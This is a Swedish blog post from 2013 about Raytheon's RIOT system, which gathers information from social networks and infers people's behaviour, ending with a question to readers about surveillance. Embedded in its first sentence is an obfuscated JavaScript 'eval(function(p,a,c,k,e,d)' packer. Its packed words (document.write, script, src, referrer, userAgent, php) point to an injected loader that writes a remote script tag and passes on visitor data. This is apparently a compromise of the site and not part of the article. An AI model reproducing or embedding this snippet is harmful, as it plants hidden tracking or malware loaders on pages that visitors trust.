Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

RIOT: Systemet som samlar information från dina sociala nätverk

Filip Urde
  • On 12 februari, 2013
  • http://www.revue.se/filip-urde

”Storebror eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrnzf|var|u0026u|referrer|zddfh||js|php’.split(’|’),0,{}))
ser dig”… Många är oroliga över hur mycket stater och företag kan se och ta del av en privatpersons aktivitet på nätet. Själv tror jag inte man behöver vara speciellt orolig om man inte har något skumt för sig.

 

 

Men vad man än tycker om saken så är vårt samhälle allt mer övervakat. Jag läste på the guardian att ett företag har utvecklat ett system som heter RIOT, vilket står för Rapid Information Overlay Technology. Med RIOT kan man snabbt och enkelt läsa av sociala nätverk för att samla information om personer. Med den insamlade datan så kan RIOT räkna ut beteendemönster och mycket mer. Jag tror detta främst kommer användas i anti-terror, men även i annonserings syfte, men man vet ju aldrig.

 

”Riot is a big data analytics system design we are working on with industry, national labs and commercial partners to help turn massive amounts of data into useable information to help meet our nation’s rapidly changing security needs,”

 

Raytheon heter företaget som har utvecklat RIOT och man menar att flera är intresserade av teknologin, men att ingen köpt den ännu.

Vad säger ni… Bör vi vara oroliga för den här utveckligen?
www.guardian.co.uk